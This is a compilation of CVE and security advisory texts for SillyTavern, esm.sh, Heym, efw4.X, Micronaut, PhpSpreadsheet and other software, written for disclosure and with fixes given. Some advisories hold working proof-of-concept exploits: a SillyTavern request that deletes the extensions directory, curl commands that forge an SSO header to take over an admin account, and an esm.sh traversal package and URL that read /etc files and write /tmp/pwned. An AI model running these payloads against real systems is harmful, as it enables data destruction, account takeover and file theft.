CVEs

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, an adversary with knowledge of an investigation ID, could update the metadata of an investigation of another user. This vulnerability is fixed in 1.2.3.

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, a remote attacker can create a map node with a malicious label that contains arbitrary HTML. When the map tab is selected and a map node marker is selected, it will render the arbitrary HTML, potentially triggering stored XSS. This vulnerability is fixed in 1.2.3.

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, a remote attacker can create a node with a malicious type that can escape an existing Cypher query and an adversary can execute an arbitrary Cypher query. This vulnerability is fixed in 1.2.3.

Thymeleaf is a server-side Java template engine for web and standalone environments. Prior to 3.1.5.RELEASE, a security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow this kind of expressions to be executed. If an application developer passes to the template engine unsanitized variables that contain such expressions, and these values are used in sandboxed contexts inside the templates, these expressions can be executed achieving Server-Side Template Injection (SSTI). This vulnerability is fixed in 3.1.5.RELEASE.

The Court Reservation – Manage Your Court Bookings Online plugin for WordPress is vulnerable to generic SQL Injection via the ‘id’ parameter in all versions up to, and including, 1.10.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

The The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.9.2.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

### Summary When `ujson.dump()` writes to a file-like object and the write operation raises an exception, the serialized JSON string object is not decremented, leaking memory. Each failed write operation leaks the full size of the serialized payload. Code that uses `ujson.dumps()` rather than `ujson.dump()` or only JSON load/decode methods is unaffected. ### Details **Vulnerability Location:** - `src/ujson/python/objToJSON.c:913` - `objToJSONFile()` function start - `src/ujson/python/objToJSON.c:931` - Error return on write failure - `src/ujson/python/objToJSON.c:942` - Early return without cleanup **Root Cause:** The `objToJSONFile()` function allocates a Python string object via `ujson_dumps_internal()`, calls the file's `write()` method, and returns early if `write()` raises an exception—but never calls `Py_DECREF(string)` on the early exit path. ### PoC ```python import gc, tracemalloc, ujson class BadFile: def write(self, s): raise RuntimeError("boom") obj = {"x": "A" * 200000} def run(): try: ujson.dump(obj, BadFile()) except RuntimeError: pass run() tracemalloc.start() gc.collect() base = tracemalloc.get_traced_memory()[0] for i in range(5): run() gc.collect() cur = tracemalloc.get_traced_memory()[0] print(i, cur - base) ``` ### Impact Any application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response. ### Remediation The missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1). ### Workarounds Replacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.

## Resolution SillyTavern 1.18.0 added a generic server-side request filter (Private Request Whitelisting). Since we expect users to use the application in a trusted environment, the filter is disabled by default, however it is strongly advised to be enabled and properly configured when an instance is being hosted over a network, as suggested by a console warning message and an officially published security checklist for administrators. Documentation: - https://docs.sillytavern.app/administration/config-yaml/#private-address-whitelisting - https://docs.sillytavern.app/administration/#security-checklist ## Note on future SSRF findings Since the request filter applies to the entire application, no SSRF vulnerabilities against individual endpoints will be accepted, unless it has been proven that a properly configured and enabled filter can be bypassed in an undocumented way. Only advisories disclosed before the 1.18.0 release will be posted if their concern is SSRF. ## Overview - Vulnerability Type: SSRF - Affected Location: `src/middleware/corsProxy.js:31` - Trigger Scenario: SSRF in optional CORS proxy ## Root Cause `corsProxyMiddleware` forwards `req.params.url` directly into `fetch(url, ...)`. It only blocks circular requests to its own host and does not enforce destination allowlist or private/loopback restrictions, enabling SSRF. ## Source-to-Sink Chain 1. Source (user-controlled input) - Entry point: `GET /proxy/:url(*)` 2. Data flow - Code analysis shows concrete propagation into this sink: - vulnerability title: `SSRF in optional CORS proxy` - sink location reached by attacker-controlled input: `src/middleware/corsProxy.js:31` - The same sink behavior is confirmed by controlled execution observations. 3. Sink (dangerous operation) - Sink location: `src/middleware/corsProxy.js:31` - Vulnerable behavior: SSRF in optional CORS proxy ## Exploitation Preconditions 1. The attacker can control or influence a URL/endpoint parameter. 2. The server can access internal or sensitive network targets. 3. Outbound request validation or redirect controls are insufficient. ## Risk This issue can be used to pivot network access and reach unintended internal resources. ## Impact An attacker may access internal network services or metadata endpoints and exfiltrate sensitive responses. ## Remediation 1. Enforce strict destination allowlist for proxy targets. 2. Block loopback, link-local, RFC1918, and metadata address ranges. 3. Apply the same destination validation to redirects.

## Resolution Fixed in SillyTavern 1.18.0: a user-provided URL is no longer reflected in the HTTP response body. ## Overview - Vulnerability Type: XSS - Affected Location: `src/middleware/corsProxy.js:40` - Trigger Scenario: reflected XSS in CORS proxy error response ## Root Cause When `fetch(url)` throws, the code sends: `res.status(500).send('Error occurred while trying to proxy to: ' + url + ' ' + error)`. The `url` value is attacker-controlled (`req.params.url`) and is not HTML-escaped before rendering. ## Source-to-Sink Chain 1. Source (user-controlled input) - Entry point: `GET /proxy/:url(*)` 2. Data flow - Code analysis shows concrete propagation into this sink: - vulnerability title: `Reflected XSS in CORS proxy error response` - sink location reached by attacker-controlled input: `src/middleware/corsProxy.js:40` - The same sink behavior is confirmed by controlled execution observations. 3. Sink (dangerous operation) - Sink location: `src/middleware/corsProxy.js:40` - Vulnerable behavior: reflected XSS in CORS proxy error response ## Exploitation Preconditions 1. The attacker can inject controllable content into a rendered response. 2. The vulnerable rendering context does not apply strict output encoding/sanitization. 3. A victim user opens the affected page or response. ## Risk This issue enables script execution in the victim context and can compromise session or data integrity. ## Impact An attacker may run arbitrary JavaScript in the victim context, steal tokens, and manipulate user-visible behavior. ## Remediation 1. Never concatenate raw user input into HTML error responses. 2. If URL echo is required, HTML-escape it or force plain-text output. 3. Re-enable/strengthen CSP to reduce reflected injection impact.

## Summary `POST /api/extensions/delete` endpoint accepts `extensionName: "."` which bypasses `sanitize-filename` validation, causing the entire user extensions directory to be recursively deleted. No authentication is required in the default configuration. ## Affected File `src/endpoints/extensions.js` (last modified: commit `3ad9b05e2`) ## Root Cause The validation check occurs **before** sanitization: ```javascript // [1] "." is truthy — passes the check if (!request.body.extensionName) { return response.status(400).send('Bad Request'); } // [2] sanitize(".") → "" const extensionPath = path.join(basePath, sanitize(extensionName)); // path.join("data\\default-user\\extensions", "") // = "data\\default-user\\extensions" ← basePath itself! // [3] Deletes the entire extensions directory await fs.promises.rm(extensionPath, { recursive: true }); ``` `sanitize-filename` converts `"."` to `""` (documented behavior). `path.join(basePath, "")` returns `basePath` itself. Result: the entire `data\default-user\extensions\` directory is deleted. ## Proof of Concept Tested on: Windows 10, SillyTavern v1.17.0, commit `004f1336e` Authentication: none (basicAuthMode: false, default configuration) Run in browser console (F12) while SillyTavern is open: ```javascript async function poc() { const { token } = await (await fetch('/csrf-token')).json(); const headers = { 'Content-Type': 'application/json', 'X-CSRF-Token': token, }; // Before: 1 extension installed const before = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('Before:', before.filter(e => e.type === 'local')); // [{ type: 'local', name: 'third-party/Extension-Notebook' }] // Attack const res = await fetch('/api/extensions/delete', { method: 'POST', headers, body: JSON.stringify({ extensionName: '.' }), }); console.log('Status:', res.status); // 200 console.log('Body:', await res.text()); // "Extension has been deleted at data\default-user\extensions" // After: empty const after = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('After:', after.filter(e => e.type === 'local')); // [] } poc(); ``` **Result:** Before: [{ type: 'local', name: 'third-party/Extension-Notebook' }] Status: 200 Body: Extension has been deleted at data\default-user\extensions After: [] ## Impact - **No authentication required** (`basicAuthMode: false` by default). Any user with network access to the SillyTavern instance can permanently delete the entire extensions directory with a single HTTP request. - All installed third-party extensions are unrecoverably lost. - With `global: true` and admin privileges, the global extensions directory shared across all users can also be deleted. - This vulnerability can be chained with CVE-2025-59159 (DNS rebinding) to enable unauthenticated remote exploitation from a malicious website. ## Same Pattern in Other Endpoints The same vulnerability exists in: - `POST /api/extensions/update` - `POST /api/extensions/version` - `POST /api/extensions/branches` - `POST /api/extensions/switch` ## Suggested Fix ```javascript const sanitized = sanitize(extensionName); // Check AFTER sanitizing if (!sanitized) { return response.status(400).send('Bad Request: Invalid extension name.'); } const extensionPath = path.join(basePath, sanitized); // Additional path traversal guard const resolvedPath = path.resolve(extensionPath); const resolvedBase = path.resolve(basePath); if (!resolvedPath.startsWith(resolvedBase + path.sep)) { return response.status(400).send('Bad Request: Invalid extension path.'); } ``` Apply the same fix to `/update`, `/version`, `/branches`, and `/switch` endpoints. ## References - CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H (9.1 Critical) - sanitize-filename npm: https://www.npmjs.com/package/sanitize-filename - Related CVE (same project): CVE-2025-59159 ##REPORTED BY Jormungandr

## Resolution SillyTavern 1.18.0 now includes a configuration option to limit which IP addresses can authorize using SSO headers, limiting to just loopback addresses by default. A setting can be customized according to user's needs. Documentation: https://docs.sillytavern.app/administration/sso/ ## Summary SillyTavern accepts `Remote-User` (Authelia) and `X-Authentik-Username` (Authentik) HTTP headers to automatically log in users when SSO is configured. There is no validation that these headers originate from a trusted reverse proxy. Any network client that can reach the SillyTavern port directly can inject these headers and authenticate as any user, including administrators, without a password. This vulnerability is exploitable only when `sso.autheliaAuth: true` or `sso.authentikAuth: true` is set in `config.yaml` (both default to `false`). ### Detials SillyTavern implements header-based SSO for Authelia and Authentik. When enabled, the `tryAutoLogin` function (called on every request to `/login`) invokes `headerUserLogin`, which reads an HTTP header set by the upstream proxy and automatically creates an authenticated session for the matching user: `src/users.js:779-801`: ```js async function headerUserLogin(request, header = 'Remote-User') { if (!request.session) { return false; } const remoteUser = request.get(header); // reads any header from any client if (!remoteUser) { return false; } const userHandles = await getAllUserHandles(); for (const userHandle of userHandles) { if (remoteUser.toLowerCase() === userHandle) { const user = await storage.getItem(toKey(userHandle)); if (user && user.enabled) { request.session.handle = userHandle; return true; } } } return false; } ``` `request.get(header)` is Express's wrapper for `req.headers[name.toLowerCase()]`. Express does not distinguish between headers set by a trusted upstream proxy and headers injected by the end client. Without an IP allowlist check, any client can set `Remote-User: ` and receive an authenticated session cookie. ### User Enumeration Pre-Condition The `/api/users/list` endpoint is registered before `requireLoginMiddleware` in `src/server-main.js:236`, making it publicly accessible without authentication: `src/server-main.js:236,239`: ```js app.use('/api/users', usersPublicRouter); // line 236 (public) app.use(requireLoginMiddleware); // line 239 (auth gate) ``` `src/endpoints/users-public.js:26-57`: ```js router.post('/list', async (_request, response) => { if (DISCREET_LOGIN) { return response.sendStatus(204); } const users = await storage.values(x => x.key.startsWith(KEY_PREFIX)); return response.json(viewModels); // returns handle, name, avatar, admin, password flags }); ``` This allows an attacker to enumerate all user handles (including admin handles) without any prior credentials. ## PoC ```bash TARGET="http://localhost:8000" # enumerate users curl -s -X POST "$TARGET/api/users/list" -H "Content-Type: application/json" -d '{}' # inject Remote-User header, receive authsession curl -s -L \ -H "Remote-User: admin-user" \ -c /tmp/st-session.txt \ "$TARGET/login" # obtain CSRF token, call admin API TOKEN=$(curl -s -b /tmp/st-session.txt "$TARGET/csrf-token" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") curl -s -X POST "$TARGET/api/users/admin/get" \ -H "Content-Type: application/json" \ -H "X-CSRF-Token: $TOKEN" \ -b /tmp/st-session.txt \ -d '{}' ``` --- ## Impact An account takeover, allowing an attacker to do anything a legitimately authorized user can do.

### Summary Changing a user’s password does not invalidate existing sessions, allowing an attacker with a stolen cookie to retain access even after the victim resets their password. ### Details SillyTavern relies on cookie-session for authentication, storing all session data (user handle, permissions) in a signed cookie. The endpoints POST /api/users/change-password and POST /api/users/recover-step2 only update the password hash in the database but do not expire current sessions. Because the session is stateless and stored entirely in the client cookie, there is no server-side mechanism to revoke a token once issued. ### PoC 1.Log into the same SillyTavern account from two different browsers (e.g., Chrome and Firefox private mode). 2.In Chrome, change the account password under User Settings → Change Password. 3.In Firefox, refresh the page or perform a protected action (e.g., view API keys). 4.Expected: Firefox session should be invalidated and ask for login. 5.Actual: Firefox remains fully authenticated, able to perform all actions as the targeted user. ### Impact An attacker who obtains a valid session cookie (via XSS, MITM, physical access, etc.) can continue using it indefinitely, even after the legitimate user changes their password. This nullifies the most common recovery measure against session theft. The default cookie lifespan is 400 days, giving an attacker a very long exploitation window. ### Resolution A fix was released in the version 1.18.0, invalidating a session cookie on account password change.

### Summary A Local File Inclusion (LFI) vulnerability exists in the esbuild plugin's handling of the `browser` field in `package.json`. An attacker can publish an npm package that causes the server to read and return arbitrary files from the host filesystem during the build process. ### Details The vulnerable code is in the `OnResolve` callback of the esbuild plugin: https://github.com/esm-dev/esm.sh/blob/main/server/build.go The plugin validates that resolved file paths stay within the package working directory. However, after this check, the `browser` field from `package.json` remaps the module path to an attacker-controlled value containing `../` sequences. No validation is performed after the remapping. ```go // Sandbox check passes for the original "./d1.txt" path if !strings.HasPrefix(filename, ctx.wd+string(os.PathSeparator)) { return esbuild.OnResolveResult{}, fmt.Errorf("could not resolve module %s", specifier) } // ... later, browser field remaps to attacker-controlled path: if len(pkgJson.Browser) > 0 && ctx.isBrowserTarget() { if path, ok := pkgJson.Browser[modulePath]; ok { if path == "" { return esbuild.OnResolveResult{ Path: args.Path, Namespace: "browser-exclude", }, nil } if !isRelPathSpecifier(path) { externalPath, sideEffects, err := ctx.resolveExternalModule(path, args.Kind, withTypeJSON, analyzeMode) if err != nil { return esbuild.OnResolveResult{}, err } return esbuild.OnResolveResult{ Path: externalPath, SideEffects: sideEffects, External: true, }, nil } modulePath = path } } // path.Join collapses "../" sequences - escapes the package directory filename = path.Join(ctx.wd, "node_modules", ctx.esmPath.PkgName, modulePath) // No second sandbox check ``` File contents appear in both the bundled JS output and the source map `sourcesContent` array. Readable files are constrained by esbuild's loader selection based on file extension: `.json` files must be valid JSON, `.txt`/`.html`/`.md` are read as raw text, files without a recognized extension must be syntactically valid JavaScript. The `config.json` of esm.sh is fully readable (valid JSON with `.json` extension). Non-existent target paths do not cause build errors - the import simply remains unresolved. This allows probing many paths in a single package, acting as a file existence oracle. ### PoC The test package is published at https://www.npmjs.com/package/chess-sec-utils1 **package.json:** ```json { "name": "chess-sec-utils1", "version": "1.0.6", "main": "index.js", "type": "module", "browser": { "./d1.txt": "../../../../../../../../etc/hostname", "./d2.json": "../../../../../../../../etc/os-release", "./d3.json": "../../../../../../../../etc/environment" } } ``` **index.js:** ```js import d1 from "./d1.txt" import d2 from "./d2.json" import d3 from "./d3.json" export default { d1, d2, d3 } ``` ```bash npm publish curl "https://<esm.sh-instance>/chess-sec-utils1@1.0.6" curl "https://<esm.sh-instance>/chess-sec-utils1@1.0.6/es2022/chess-sec-utils1.mjs.map" ``` Server file contents in source map response: ```json { "sourcesContent": [ "ideapad\n", "PRETTY_NAME=\"Ubuntu 22.04.5 LTS\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.04\"\nVERSION=\"22.04.5 LTS (Jammy Jellyfish)\"\nVERSION_CODENAME=jammy\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=jammy\n", "PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin\"\n", "import d1 from \"./d1.txt\"..." ] } ``` <img width="1720" height="796" alt="image" src="https://github.com/user-attachments/assets/ee1c9781-2c5c-4718-b436-f6cf453f0952" /> ### Impact An attacker can read sensitive files from the server, including the esm.sh `config.json` which may contain npm registry authentication tokens and S3 storage credentials. ### Fix Add a path validation check after the `browser` field remapping: ```go filename = path.Join(ctx.wd, "node_modules", ctx.esmPath.PkgName, modulePath) if !strings.HasPrefix(filename, ctx.wd+string(os.PathSeparator)) { return esbuild.OnResolveResult{}, fmt.Errorf("path traversal blocked") } ``` ### Credit Svyatoslav Berestovsky of Metascan

### Impact - Arbitrary File Write – An attacker can cause the server to write data to any file path it has write permission for. - Privilege Escalation / RCE – By overwriting critical binaries or scripts, the attacker can execute arbitrary code with the server’s privileges. ### Exploit The legacy router first retrieves a response from `legacyServer`, parses the incoming request path, and ultimately writes the data to storage via `buildStorage.Put` (see <https://github.com/esm-dev/esm.sh/blob/4312ae93e518121e764a18bb521af12e490ef137/server/legacy_router.go#L291>). For a URL such as: ``` http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned ``` the router concatenates the path components without sanitizing them, producing a storage key like: ``` legacy/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned ``` When this key is used, the underlying file system resolves the relative segments and writes the file to `/tmp/pwned`. Thus an attacker can craft a request that writes data to arbitrary locations on the server. ### Details 1. **URL Construction** A crafted request is sent to the server: ``` http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned ``` 2. **Proxy to Legacy Server** The request is forwarded to: ``` http://legacy.esm.sh/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../tmp/pwned ``` which resolves to: ``` http://legacy.esm.sh/gh/<attacker>/exp@1171e85d5d/foo.md ``` 3. **File Retrieval** The server fetches `foo.md` from the GitHub repository `https://github.com/<attacker>/exp`. 4. **Path Normalisation & Storage** The storage path derived from the request is: ``` legacy/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned ``` Normalising this path yields `/tmp/pwned`. The retrieved file content is then written to that location. 5. **Result** By repeating this pattern, an attacker can overwrite arbitrary binaries or scripts on the server, paving the way for remote code execution. ### Credit Discovery To splitline (@\_splitline\_) from DEVCORE Research Team

Rejected reason: This CVE ID has been rejected or withdrawn.

Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.

Heym before 0.0.21 contains an authorization bypass vulnerability in workflow execution that allows authenticated users to execute arbitrary workflows by referencing victim workflow UUIDs without proper access validation. Attackers can create workflows with execute nodes or agent subWorkflowIds pointing to victim workflow UUIDs to load and execute those workflows under attacker-controlled execution paths, exposing victim workflow outputs and triggering workflow nodes with unintended side effects.

Heym before 0.0.21 contains a path traversal vulnerability in the file upload endpoint that allows authenticated users to write attacker-controlled files to arbitrary locations by supplying a crafted filename with traversal sequences. Attackers can exploit the unvalidated filename parameter in the upload_file() handler to bypass path restrictions and write, read, or delete files outside the intended storage directory.

Command injection vulnerabilities exist in the command line interface (CLI) service accessed by the PAPI protocol of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system.

Mako is a template library written in Python. Prior to 1.3.12, on Windows, a URI using backslash traversal (e.g. \..\..\ secret.txt) bypasses the directory traversal check in Template.__init__ and the posixpath-based normalization in TemplateLookup.get_template(), allowing reads of files outside the configured template directory. This vulnerability is fixed in 1.3.12.

Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.73.21 and 6.15.0, responses from the forgot password forms hinted at whether an account existed for a given email address. An unauthenticated attacker could use this to enumerate valid users, which can aid in follow-up credential-based attacks. This vulnerability is fixed in 5.73.21 and 6.15.0.

Lemur manages TLS certificate creation. Prior to 1.9.0, when LDAP TLS is enabled (LDAP_USE_TLS = True), Lemur's LDAP authentication module unconditionally disables TLS certificate verification at the global ldap module level. This allows a man-in-the-middle attacker positioned between Lemur and the LDAP server to intercept all authentication credentials. This vulnerability is fixed in 1.9.0.

Lemur manages TLS certificate creation. Prior to 1.9.0, Lemur's LDAP authentication module (lemur/auth/ldap.py) constructs LDAP search filters using unsanitized user input via Python string interpolation. An authenticated LDAP user can inject LDAP filter metacharacters through the username field to manipulate group membership queries and escalate their privileges to administrator. This vulnerability is fixed in 1.9.0.

Snappier is a high performance C# implementation of the Snappy compression algorithm. Prior to 1.3.1, Snappier.SnappyStream enters an uncatchable infinite loop when decompressing a malformed framed-format Snappy stream as small as 15 bytes. This vulnerability is fixed in 1.3.1.

Hugo is a static site generator. From 0.43 to before 0.161.0, when building a Hugo site that uses Node-based asset pipelines (PostCSS, Babel, TailwindCSS), Hugo invoked the configured Node tools without restrictions on file system access. As a result, executing hugo against an untrusted site could allow code running through these tools to read or write files outside the project's working directory. Users who do not use PostCSS, Babel, or TailwindCSS, or who only build trusted sites, are not affected. This vulnerability is fixed in 0.161.0.

Deskflow is a keyboard and mouse sharing app. Prior to 1.26.0.167, a remote, unauthenticated denial of service (DoS) vulnerability affects Deskflow servers running with TLS enabled (the default). When any TCP peer connects to the listening port and its first bytes do not parse as a valid TLS ClientHello, SecureSocket::secureAccept enters its fatal-error branch and calls Arch::sleep(1) (a blocking 1-second sleep) on the multiplexer worker thread. That thread services every socket on the server, including established TLS clients delivering mouse motion, keyboard events, and clipboard updates. A single failed handshake therefore stalls input delivery to all connected screens for ~1 second, and a sustained drip of malformed connections (≥ 1/s) makes the server effectively unusable while the attack persists. This vulnerability is fixed in 1.26.0.167.

Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22.

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the readonly flag set on the <efw:elFinder> JSP tag is intended to prevent file modifications. When protected=true, elfinder_checkRisk enforces that the client sends readonly=true (matching the session value), but no event handler checks the readonly value before performing write operations. The flag only controls client-side UI elements (disabling buttons) and response metadata (write: 0, locked: 1). An attacker who sends requests directly (bypassing the UI) can perform all file operations despite readonly=true. This vulnerability is fixed in 4.08.010.

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the previewServlet serves files with their detected MIME type based on file extension, without any content sanitization or security headers. Files with .html, .htm, or .svg extensions are served as text/html or image/svg+xml respectively, causing any embedded JavaScript to execute in the victim's browser within the application's origin. This vulnerability is fixed in 4.08.010.

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the elfinder_checkRisk function validates target and targets for path traversal and home containment, but does not validate the dst (destination) parameter used by elfinder_paste. An attacker can copy or move files from within the home directory to any arbitrary destination by setting dst to a base64-encoded traversal path. This bypasses the protected=true security control. This vulnerability is fixed in 4.08.010.

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, efw.file.FileManager.unZip writes zip entries to disk using new File(baseDir, zipEntry.getName()) with no canonical-path check. An entry name such as ../../../pwned.jsp escapes the intended extraction directory and lands anywhere the Tomcat process can write — including the servlet context root. Combined with the framework's multipart /uploadServlet and an event that calls file.saveUploadFiles + FileManager.unZip, a remote attacker with no credentials drops a JSP webshell and executes arbitrary commands as the Tomcat user. This vulnerability is fixed in 4.08.010.

Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. Prior to 4.10.22, the bundleCache is keyed by (Locale, baseName) where the locale originates from the HTTP Accept-Language header. In applications that explicitly register a ResourceBundleMessageSource bean and serve HTML error responses, an unauthenticated attacker can exhaust heap memory by sending requests with large numbers of unique Accept-Language values, each causing a new entry in the unbounded bundleCache. This vulnerability is fixed in 4.10.22.

Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. From 4.3.0 to before 4.10.22, TimeConverterRegistrar caches DateTimeFormatter instances in an unbounded ConcurrentHashMap<String, DateTimeFormatter> whose key is derived from the @Format annotation pattern concatenated with the locale from the HTTP Accept-Language header. Because Locale.forLanguageTag() accepts arbitrary BCP 47 private-use extensions (en-x-a001, en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This vulnerability is fixed in 4.10.22.

Nginx UI is a web user interface for the Nginx web server. In 2.3.4 and earlier, an authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the X-Node-ID header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.

wger is a free, open-source workout and fitness manager. Prior to 2.6, the reset_user_password and gym_permissions_user_edit views in wger perform a gym-scope authorization check using Python object comparison (!=) that evaluates None != None as False, silently bypassing the guard when both the attacker and victim have no gym assignment (gym=None). A user with gym.manage_gym permission and gym=None can reset the password of any other gym=None user; the new plaintext password is returned verbatim in the HTML response body, enabling one-shot full account takeover. The victim's original password is invalidated, locking them out permanently. This vulnerability is fixed in 2.6.

arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, the WebServer Digest authentication implementation in arduino-esp32 computes the authentication hash using the URI field from the client's Authorization header, without verifying that it matches the actual requested URI. This allows an attacker who possesses any valid digest response (computed for URI-A) to authenticate requests to a completely different protected URI (URI-B), bypassing per-resource access control. This vulnerability is fixed in 3.3.8.

arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, the WebServer multipart form parser in arduino-esp32 allocates a Variable Length Array (VLA) on the stack whose size is derived from an attacker-controlled HTTP header field (Content-Type: multipart/form-data; boundary=...) without enforcing any length limit. Sending a boundary string longer than ~8000 characters overflows the 8192-byte task stack of the loopTask, causing a crash and potential remote code execution. This vulnerability is fixed in 3.3.8.

Grav is a file-based Web platform. In Grav 2.0.0-beta.2, a low-privileged authenticated API user with api.media.write can abuse /api/v1/blueprint-upload to write an arbitrary YAML file into user/accounts/, then log in as the newly created account with api.super privileges. This results in full administrative compromise of the Grav API. This vulnerability is fixed in API 1.0.0-beta.17.

Granian is a Rust HTTP server for Python applications. From 0.2.0 to 2.7.4, Granian aborts a worker process if a WSGI application returns an invalid HTTP response header name or value. The WSGI response conversion path uses .unwrap() on both the header name and header value constructors, so malformed output from the application becomes a process abort instead of a handled error. This vulnerability is fixed in 2.7.4.

Granian is a Rust HTTP server for Python applications. From 1.2.0 to 2.7.4, Granian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose Sec-WebSocket-Protocol header contains non-ASCII bytes. The crash happens in Granian's WebSocket scope construction path, before the ASGI application is invoked. This vulnerability is fixed in 2.7.4.

ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx. From 3.0.0 to before 3.0.15, there is an unhandled exception (std::out_of_range) caused by unsigned integer underflow in libmodsecurity3 if the user (administrator) uses a rule any of @verifySSN, @verifyCPF, or @verifySVNR. This vulnerability is fixed in 3.0.15.

django-s3file is a lightweight file upload input for Django and Amazon S3. Prior to 7.0.2, S3FileMiddleware is vulnerable to relative path traversal attacks, where an attacker can use a modified request to escape pre-signed upload locations and have the Django application load files from random locations into request.FILES. Depending on how files are handled, this may lead to confidentiality and integrity issues. This vulnerability is fixed in 7.0.2.

mosparo is the modern solution to protect your online forms from spam. Prior to 1.4.13, the automatic rule package source URL feature allows a project member with the editor role to store an attacker-controlled URL that the server later fetches. Because the server follows http/https redirects and does not restrict private or loopback destinations, this becomes a stored SSRF primitive that can be turned into an internal HTTP probing oracle. This vulnerability is fixed in 1.4.13.

PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0, the XLSX reader's ColumnAndRowAttributes::readRowAttributes() method reads row numbers from XML attributes without validating them against the spreadsheet maximum row limit (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a minimal XLSX file (~1.6KB) containing a <row r="999999999"/> element that inflates cachedHighestRow to 999,999,999, causing any subsequent row iteration to attempt ~1 billion loop cycles and exhaust CPU resources. This vulnerability is fixed in 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0.

PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0, the SpreadsheetML XML reader (Reader\Xml) does not validate the ss:Index row attribute against the maximum allowed row count (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a SpreadsheetML XML file with ss:Index="999999999" on a <Row> element, which inflates the internal cachedHighestRow to ~1 billion. Any subsequent call to getRowIterator() without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. This vulnerability is fixed in 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0.

